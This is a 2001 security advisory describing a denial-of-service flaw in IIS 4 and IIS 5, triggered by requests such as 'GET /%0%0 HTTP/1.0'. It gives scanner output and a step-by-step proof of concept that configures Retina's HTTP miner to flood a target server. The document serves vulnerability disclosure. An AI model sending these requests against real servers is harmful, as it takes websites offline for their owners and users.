______________________________________________________________________ NtWaK0, SecurHack. Labs Security Advisory 1-13-2001 DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0 ______________________________________________________________________ oooooooooooooooooo Vulnerable Systems oooooooooooooooooo IIS 4 and IIS 5 even if fully patched. oooooooo Synopsis oooooooo While playing with miner in retina I sent this GET /%0%0 HTTP/1.0 to one of my IIS 4 and IIS 5 servers, I noticed that retina is taking a lot of time to jump to the next defined variable in the brain.ini which should be GET /%0%1 and so on. Retina Result ooooooooooooo Command: GET /%0%0 HTTP/1.0 Notes:: Connection to server lost. Error:: 10060 Command: GET /_vti_inf.html%0%0 HTTP/1.0 Notes:: Connection to server lost. Error:: 10060 Command: GET /_vti_inf.html%0%0 HTTP/1.0 Notes:: Connection to server lost. Error:: 10060 Pinging the box while running retina even from different subnet it wont answer. You can connect to the web but you have to wait forever for it to load. I have tried that on IIS 4 and II 5 and same result .... oooooooooooooooo Proof-Of-Concept oooooooooooooooo 1- Get Retina From eeye.com 2- Install it 3- Edit the file Brain.ini located C:\Program Files\Retina 2.0\Modules\Retina\Miner\brain.ini <default 4- Put this in your brain.ini file [General] Title=HTTP Miner [Commands] 1=GET /%%cgi-bin%%%%passwordfile%%%%passwordfile%% HTTP/1.0 [Variables] cgi-bin=, passwordpath=%0,%1,%2,%3,%4,%5,%6,%7,%8,%9,%a,%b,%c,%d,%e,%f, 5- Run retina and choose miner and type your IP GO :) Btw that will start sending GET /%0%0 HTTP/1.0 GET /%0%1 HTTP/1.0 etc To see the result open up your browser and point to the IP you are mining and you will notice you can just connect and your LAN in my case cable is almost flooded. Ping the IP you are mining and you will get a Ping time out. Even if you try to connect to that IP from totally a different network you wont be able to view the page or it will take for-ever to load. oooooooooo Resolution oooooooooo No Idea :( ooooooo Credits ooooooo The discovery and documentation of this vulnerability was conducted by NtWaK0. For more information Dalnet channel #security ______________________________________________________________________ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. ____________________________________________________________.__________ Live Well Do Good | Accept no limitations \(|)/ /`\ NtWaK0